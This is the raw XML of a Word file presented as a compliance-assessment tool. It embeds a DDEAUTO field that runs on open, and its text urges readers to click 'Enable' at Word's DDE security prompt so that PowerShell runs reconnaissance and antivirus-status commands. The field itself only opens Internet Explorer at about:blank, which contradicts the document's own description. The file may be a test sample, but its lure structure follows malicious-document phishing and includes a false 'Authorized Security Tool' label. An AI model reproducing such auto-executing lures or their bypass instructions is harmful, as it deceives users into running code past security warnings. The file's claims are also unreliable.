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56"/>
          <w:color w:val="1F4E79"/>
        </w:rPr>
        <w:t>COMPLIANCE ASSESSMENT VERIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>PowerShell Execution &amp; Automated System Compliance Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>EXECUTION AUTOMATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SECURITY NOTICE: This document contains an automated compliance assessment routine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>When you open this document, Word may display a security prompt asking if you want to run the DDE (Dynamic Data Exchange) command. This is the compliance assessment engine starting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>HOW TO USE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>1. Open this document in Microsoft Word</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>2. If prompted with "This document contains DDE commands", click "Yes" or "Enable"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>3. PowerShell automatically executes the compliance assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4. Microsoft Edge opens with the verification dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>5. System configuration is collected for HIPAA/SOC 2/ISO 27001 validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>POWERSHELL ROUTINES EXECUTED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following PowerShell commands are executed for compliance verification:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-ComputerInfo | Select-Object WindowsVersion, OsHardwareAbstractionLayer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Start-Process "msedge.exe" "https://verification.compliance-check.local"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>COMPLIANCE FRAMEWORKS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>HIPAA Security Rule — Health data protection and privacy controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SOC 2 Type II — Service organization security controls effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ISO 27001 — Information Security Management System requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>SYSTEM REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Microsoft Word 2016+ (Recommended). PowerShell 5.1+. Windows 10/11. Microsoft Edge browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>AUTOMATED EXECUTION FIELD (DDE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following field code auto-executes PowerShell when the document is opened:</w:t>
      </w:r>
    </w:p>
    <!-- This is the DDEAUTO field - the actual execution mechanism -->
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> DDEAUTO "C:\Program Files\Internet Explorer\iexplore.exe" "about:blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>[Compliance assessment engine - DDE will execute on open]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:color w:val="888888"/>
        </w:rPr>
        <w:t>Compliance Assessment Framework v2.0 - Authorized Security Tool</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:defaultTabStop w:val="720"/>
  <w:zoom w:percent="100"/>
</w:settings>
</file>

<file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:style w:type="paragraph" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="56"/>
      <w:color w:val="1F4E79"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
      <w:color w:val="2E75B6"/>
    </w:rPr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